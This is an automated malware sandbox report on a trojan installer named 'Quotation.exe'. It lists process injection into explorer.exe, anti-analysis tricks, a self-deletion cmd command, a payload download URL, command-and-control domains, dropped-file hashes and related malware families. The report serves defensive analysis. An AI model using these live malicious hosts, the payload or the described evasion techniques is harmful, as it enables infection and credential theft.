      Source: C:\Users\user\Desktop\Quotation.exeNtQueueApcThread: Indirect: 0x33C5A4F2Jump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: NULL, target: C:\Windows\explorer.exe, protection: read write
      Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: NULL, target: C:\Windows\explorer.exe, protection: execute and read and write
      Source: C:\Users\user\Desktop\Quotation.exe | Thread register set: target process: 1028
      Source: C:\Windows\SysWOW64\colorcpl.exe | Thread register set: target process: 1028
      Source: C:\Users\user\Desktop\Quotation.exe | Thread APC queued: target process: C:\Windows\explorer.exe
      Source: C:\Users\user\Desktop\Quotation.exe | Section unmapped: C:\Windows\SysWOW64\colorcpl.exe, base address: BC0000
      Source: C:\Users\user\Desktop\Quotation.exe | Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
      Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Quotation.exe"
      Source: explorer.exe, 00000005.00000002.3262974306.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094424197.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094747500.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd=
      Source: explorer.exe, 00000005.00000002.3258112322.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2520256352.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
      Source: explorer.exe, 00000005.00000002.3258112322.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3259689305.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2520256352.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000005.00000002.3258112322.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2520256352.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
      Source: explorer.exe, 00000005.00000002.3258112322.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2520256352.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
      Source: explorer.exe, 00000005.00000000.2519828963.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3257532764.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PProgman
      Source: C:\Users\user\Desktop\Quotation.exe | Code function: 0_2_004034FC EntryPoint, SetErrorMode, GetVersionExW, GetVersionExW, GetVersionExW, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, lstrlenW, LdrInitializeThunk, wsprintfW, GetFileAttributesW, DeleteFileW, LdrInitializeThunk, SetCurrentDirectoryW, LdrInitializeThunk, CopyFileW, OleUninitialize, ExitProcess, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess

      Stealing of Sensitive Information

      Source: Yara match | File source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match | File source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      MITRE ATT&CK Matrix

      Techniques flagged for this sample, grouped by tactic; the number in parentheses is the count badge shown in the matrix cell:

      Execution: Native API (1); Shared Modules (1)
      Persistence: DLL Side-Loading (1)
      Privilege Escalation: Access Token Manipulation (1); Process Injection (412); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
      Defense Evasion: Rootkit (1); Masquerading (1); Virtualization/Sandbox Evasion (2); Access Token Manipulation (1); Process Injection (412); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); DLL Side-Loading (1)
      Credential Access: Credential API Hooking (1)
      Discovery: Security Software Discovery (221); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (23)
      Collection: Credential API Hooking (1); Archive Collected Data (1); Clipboard Data (1)
      Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (112)
      Impact: System Shutdown/Reboot (1)

      No techniques are flagged under Reconnaissance, Resource Development, Initial Access, Lateral Movement or Exfiltration.
      Behavior Graph (ID: 1554157) - Sample: Quotation.exe, start date: 12/11/2024, architecture: WINDOWS, score: 100

      Start node
        DNS: www.rbis.site, www.alkak.cam
        Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 8 other signatures
        -> started: Quotation.exe
      Quotation.exe (first instance)
        Dropped file: C:\Users\user\AppData\Local\...\System.dll, PE32
        Signatures: Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
        -> started: Quotation.exe (second instance)
      Quotation.exe (second instance)
        Network: 94.141.120.137, 49836, 80, UNITLINE_RST_NET1RostovnaDonuRU, Russian Federation
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
        -> injected: explorer.exe
      explorer.exe
        -> started: colorcpl.exe
      colorcpl.exe
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
        -> started: cmd.exe
      cmd.exe
        -> started: conhost.exe

      Antivirus Detection (Source | Detection | Scanner | Label | Link)

      Submitted sample:
        Quotation.exe | 17% | Virustotal | - | Browse
        Quotation.exe | 100% | Avira | HEUR/AGEN.1333748 | -

      Dropped files:
        C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll | 0% | ReversingLabs | - | -

      No Antivirus matches
      No Antivirus matches
      Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
        www.alkak.cam | unknown | unknown | true | - | unknown
        www.rbis.site | unknown | unknown | true | - | unknown

      Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
        http://94.141.120.137/qVMezflLJCc194.bin | true | Avira URL Cloud: malware | unknown
        www.84jys301.top/hy29/ | true | Avira URL Cloud: safe | unknown

      URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation)
                              unknown
                              https://outlook.comexplorer.exe, 00000005.00000003.3094424197.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094747500.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262974306.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                http://www.ustdoit.store/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.84jys301.top/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ustdoit.storeReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.veriox.xyzexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.unnify.net/hy29/www.ylosnackpark.onlineexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.yaanincma.storeexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.rbis.siteReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.zrk148.inkexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.alkak.cam/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://android.notify.windows.com/iOSexplorer.exe, 00000005.00000002.3259903697.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2521577979.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  http://www.nline-advertising-18349.bond/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.unnify.netexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdQuotation.exe, 00000003.00000001.2393775567.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                    high
                                    http://www.owboyaero.netexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.owboyaero.net/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.msn.com/explorer.exe, 00000005.00000002.3262290605.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.vexplorer.exe, 00000005.00000002.3257532764.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2519828963.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.84jys301.topexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.ulunguwethu.storeReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.rbis.site/hy29/www.alkak.camexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
IP: 94.141.120.137
Domain: unknown
Country: Russian Federation
ASN: 43429
ASN Name: UNITLINE_RST_NET1RostovnaDonuRU
Malicious: false
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1554157
                                        Start date and time:2024-11-12 07:34:10 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 9s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Quotation.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@8/9@2/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 93%
                                        • Number of executed functions: 83
                                        • Number of non-executed functions: 285
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:36:00 | API Interceptor | 558x Sleep call for process: explorer.exe modified
01:36:34 | API Interceptor | 50x Sleep call for process: colorcpl.exe modified
Match: UNITLINE_RST_NET1RostovnaDonuRU
Associated Sample Name / URL | Detection | Threat Name | Context
QUOTATION#09678.exe | malicious | RedLine | 94.141.120.6
hidakibest.ppc.elf | malicious | Gafgyt, Mirai | 94.141.123.127
hidakibest.mips.elf | malicious | Gafgyt, Mirai | 94.141.123.127
hidakibest.x86.elf | malicious | Mirai, Gafgyt | 94.141.123.127
hidakibest.arm7.elf | malicious | Gafgyt, Mirai | 94.141.123.127
hidakibest.arm4.elf | malicious | Gafgyt, Mirai | 94.141.123.127
hidakibest.arm6.elf | malicious | Gafgyt, Mirai | 94.141.123.127
hidakibest.arm5.elf | malicious | Gafgyt, Mirai | 94.141.123.127
hidakibest.sparc.elf | malicious | Gafgyt, Mirai | 94.141.123.127
hidakibest.mpsl.elf | malicious | Gafgyt, Mirai | 94.141.123.127
Match: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll
Associated Sample Name / URL | Detection | Threat Name
CERTIFICADO TITULARIDAD.exe | malicious | GuLoader, Snake Keylogger
SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe | malicious | GuLoader
SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe | malicious | GuLoader
D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe | malicious | FormBook, GuLoader
D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe | malicious | GuLoader
UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader
UMOWA_PD.BAT.exe | malicious | GuLoader
Payment_Advice.1.bat.exe | malicious | FormBook, GuLoader
Payment_Advice..exe | malicious | FormBook, GuLoader
Payment_Advice..exe | malicious | GuLoader
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):12288
                                                            Entropy (8bit):5.805604762622714
                                                            Encrypted:false
                                                            SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                            MD5:4ADD245D4BA34B04F213409BFE504C07
                                                            SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                            SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                            SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: CERTIFICADO TITULARIDAD.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious
• Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious
• Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious
• Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious
• Filename: UMOWA_PD.BAT.exe, Detection: malicious
• Filename: UMOWA_PD.BAT.exe, Detection: malicious
• Filename: Payment_Advice.1.bat.exe, Detection: malicious
• Filename: Payment_Advice..exe, Detection: malicious
• Filename: Payment_Advice..exe, Detection: malicious
                                                            Reputation:moderate, very likely benign file
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):336059
                                                            Entropy (8bit):7.685795992578951
                                                            Encrypted:false
                                                            SSDEEP:6144:qlpgooECED9kKq/KQn/NLhyHn8d1pCTnDegKywAzhH/eBCV6nK:agd+kKq/lTyHn8Tkel4deBCMnK
                                                            MD5:02E289B40EC2F4B3300D0A1A42C7C26D
                                                            SHA1:3036ADF93F4E602DD419FFDE5DC305598CC687F8
                                                            SHA-256:4300DEEF2FFF5C90A22D98006F2DD1A9050929CD90E28BAF375E6A6D07B7196A
                                                            SHA-512:79AABB29E98064391B83636B425E68E074D7387F71ABEE3D92822E19EB41A081CA4DB5FA38713C2882775246A6A38E13F1E82CF434025E9A9C403D95F57FB25E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......I....ww....ss.........../.........NN..r....tt......"...........h...###.."..........R......."""...........ee.............................:..................................O......kkk..>>.................1...yy.......44..........^.l........Y..#....t...f......&..p........j.OlY...T[...2..>..-...(.f.........<.u.... .r..J5.b2.I|'&.*.......e*..ZK.'.....<......,...:fi....f.v..+y0.1...QdqH...BN.?V..4w8.{..m.g"6.7oP...x./.g......>..D....\C..}..#....=^..WS...._;.......EF..3.../.........f........H..A....9..%...Lt@......$.....!.H=....+....G..p........j.OlY...T[. .f......H.2..>..-...(..u.... .r..J5.b2.I|'&.*.......e*..ZK.'.....<......,.....i..2......#fiay0.1...QdqH...BN.?V..4w8.{..m.g........6.7oP...x...D....\C..}..#......f.s....?=^..WS...._;.......EF..3.../............A....9..%...Lt@.....8.G..u.f....A...$.....!.H=....+....G..p........j.OlY...T[...2..>..-...(...f....i..<.u.... .r..J5.b2.I|'&.*.......e*..ZK.'.....<......,...:fi...f....+y0.1...QdqH...
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):373
                                                            Entropy (8bit):4.272746850105327
                                                            Encrypted:false
                                                            SSDEEP:6:6IXKBWL5apAUHkR+HFm0V/cyl5D0ETOrMJVD3DyMOA+JC5HHrAkud4rKsXk3lMn3:6wZapAloN/cyl6ETOkV/faGs1VU3
                                                            MD5:0682CF0C326528B5BA6E9AC2042D9A00
                                                            SHA1:EDE298B8E7EBB1DB030AE121E50231B9FC3ACD55
                                                            SHA-256:1CA49FA8260240725688ADFB399DDC7DB516B7EAC4A5136A624AF5E231EBDB6D
                                                            SHA-512:76E19E89659E67D30BC1C171622D2884D5A578828F89EF7BB138D036A42560307F2E72C2924381E226049AC94AB4A16944FA8113E4E9EE22FF39F7F4CA61EC8B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:hatikvah gldstning finansloven favourables.minutviserne slidgigts coumalic drollingly biogassens comprachicos sinningly.eboulement flapper haandbogens algebraizations filoperationer kontaktpersonens..nekromantikers cattier skifertkket,sempres aldersprsident deploys fremmet.bestialskes gangafstands totalitarismes entoils himmelblaa feteret fidusmageriernes billedskrifts..
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):355104
                                                            Entropy (8bit):1.2517572138569224
                                                            Encrypted:false
                                                            SSDEEP:768:vBV5n0H6bwRwLskHSX1dUZThdnbTc0og7ZSDUEyN/Kr70+jPbuLi9C42IR+ieakD:XbI0oy4FIi8/4GkpM1Yv+eq
                                                            MD5:DC1F74F786EB4B2603992B0F28E08486
                                                            SHA1:0FB18798B3D067CC05FC67F72F126438D14F3EEF
                                                            SHA-256:D13ABD4F2B194A042074D7E6E2B39526FDF74A432C44BFE380FB7ADAC837A9EB
                                                            SHA-512:8544226245581C50A295F077EC297F6F288EEC7A9525CA891C44BA6A01246D0D146EA78763EC5B850C0FBE01A456EA31F46FC6890244DFC99C3C9483C42CAAC2
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..................................+................................d...........g....................................................d.....T........................................A..^.................................&.....3...............................................8................:...F......................]...........F......................./....................Z....................................................}.......#.............e.....................................................................................................................................................|..C.....O...................................'.....................e....;.....)...............................................................................2.........................................O.............!................................\...............~...............s.........l....................5..C..........................................6..........|..................8.................
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):145899
                                                            Entropy (8bit):4.620235574919702
                                                            Encrypted:false
                                                            SSDEEP:1536:AQ9cCEgX0PvPgQff3y+lsybfc/paAlt5jF7w7s/z3+QbEjLM2LwPSYOu9K/h66mt:V1X0XPZB2yb0M37CvEM2Leahpmpv
                                                            MD5:8D795C6A7B5744F6512A4853C455AC01
                                                            SHA1:64B46909F5D347DDADC97CAA4C6BFB1EFB06CC5A
                                                            SHA-256:68F8D69EB8AC4B378CC707CBA4C46F1342294FD7090B43D8791C75E4D7E79A81
                                                            SHA-512:E7C98409C3A712717130F25BA557C92E13559965C5B061F64DFCF739D0FCE822760272637E6D955C8444E9890C8CE331A78C92B1DC8E158410BDCE3EA50DBE20
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.................................TTT..........................................`...................F............u..................SS..........!..............u.=..xxxxxxx......%.............F.......Q.SSSS....qq......)).........N......nnnnn......AA.O..............F...........dd....................................LL..x........................ZZ........c..................m..........kk.-...............P.cc.....N.................222.........MMM.........KKK.............................CCCC......v.............................T..................................c...................2.!......'................%.PPP....................,.......QQ..cccc......|....ff....lll........h.................^^.......................ll...........nn................||.F..W..................$$......................TT..oo............s...CC.lllll..............xx....................F....''.........................................]]]...........00........................................Q..~~~...........>>>....:.........
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):398408
                                                            Entropy (8bit):1.2541470481941865
                                                            Encrypted:false
                                                            SSDEEP:768:XLcoKgaILqV22/BVLR+CqlRO+6UMdZH2MHoOXeHBaLYQ/zLN8vHN6Bqg+R+5bP1P:XLvaVDBsdDUwU8ftgTd+C9Rs8
                                                            MD5:A82E7BBC06096A0D4DA946CB590D39E5
                                                            SHA1:6E766E5C6394AE7012EF3A2A9B5F60B1530D82C2
                                                            SHA-256:839929F76FCFE7E5845C32D7A8BA32E022358D2B91C338D76CCE06D8201B816C
                                                            SHA-512:DDBA5A1391834BE21B53BC71071A7B9E59274F1C32337417D2EFE422632BF96A678D695E63790BD9AC86DFFF75BB1920C5796DEF03F1784383BB7C6219B9C971
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.............................r................x...........U............................#....E...............................................G...........,......<M...........................................Z.............%......................................................................................................................................r................B................................7........................%........d.................<....[................................v......................................................._.............:....N...........................0.............................../..................1....................Y.....3..+.........9......A........t.........................^.....................[.......|................z.......................................................m................._............................<................D..$............L...D.......V...............................!.....p....................................
Process: C:\Users\user\Desktop\Quotation.exe
File Type: data
Category: dropped
Size (bytes): 227396
Entropy (8bit): 1.2530859401625676
Encrypted: false
SSDEEP: 768:gIyS4vBPb5KHsHjNXRzFiGNayC9sdCuO2eGx7UIpy01EPJTCVOy7KWWTYjypuSU7:w/DjoGsr6TpSzhsJmPn
MD5: 82841FB39343FC19CE14AC4FA68A5777
SHA1: CDE9D16579DCC3387D3535C2835EE6F728D14F7A
SHA-256: 394256420FEF9D66B56217A51643E2A4A2FA7C64930C7D71C95621FDAA92A3D9
SHA-512: 33059AE752CA3EEF81E4510E6F2EB3C1ACAACDB30F81D89CCD57E9C918F61CBED6E768D41ABEAFA6C28DF6DE08AC5D14FBFCC9012AB4408BE3E197AB77017E7F
Malicious: false
Process: C:\Users\user\Desktop\Quotation.exe
File Type: data
Category: dropped
Size (bytes): 214298
Entropy (8bit): 1.269910282868063
Encrypted: false
SSDEEP: 768:1Q4u1xemsnw5v7I+7hvIqeXaekN3UUYG09jzsjrne0KWlsXr5COJxLePaDw50fEY:SfRNVNBf+EWbA3EZOo
MD5: 6C494DB16E43F8AC50D8B2F6286018ED
SHA1: 4D1685B1C9910C56907CDE3B9F9ECAD026CB5452
SHA-256: 9B8646AAB1D81935430CB04886347E78DBE221A929E2B83D245066587AAC6D4C
SHA-512: 3CD4ACF5FEB9613D706413469D63EFD0B5E3D10A8DC9B9E98C822FA99BDD47D481F5BF6CB0ADC7BD1086C9166C7309CD219142A3DA84FBA2026C7847E811AAA1
Malicious: false
Process: C:\Users\user\Desktop\Quotation.exe
File Type: data
Category: dropped
Size (bytes): 228290
Entropy (8bit): 1.244318325113103
Encrypted: false
SSDEEP: 768:G7vhTgPtsggM49EMnFuc4uIiRRc9go4HRuy/T0gHNIOeMROQTIPox3vgeBj6Wgd8:Gzvxjx5T4wYlu6gzJ7
MD5: 22014F703A11E58AE60FF694BD36C788
SHA1: 46D0F9990D492D396CFD827546E76A20AD8BCA73
SHA-256: 964090AB5367EFD0FAC687630F3AEEF67755FEC32DA9EF84DBC9499557B1445B
SHA-512: 0FC6A473F07BD387106B8465FA4DA003EC212C28C335DA1F81E8C60C5D9788F9C2F724F0802886375EF74EE390AB8F763B395EE7902BD110A3DE57E7573C95EE
Malicious: false
File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.944429250308074
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Quotation.exe
File size: 690'000 bytes
MD5: 0a4e34ccc6e3e118f225a4f38f731a14
SHA1: d8f89c49dbf6376607ea5379963bd95973fbfd18
SHA256: 5bdeae823decc2e03dbe71ea05e7ea871badc0865c0a2d0580d69761e1175900
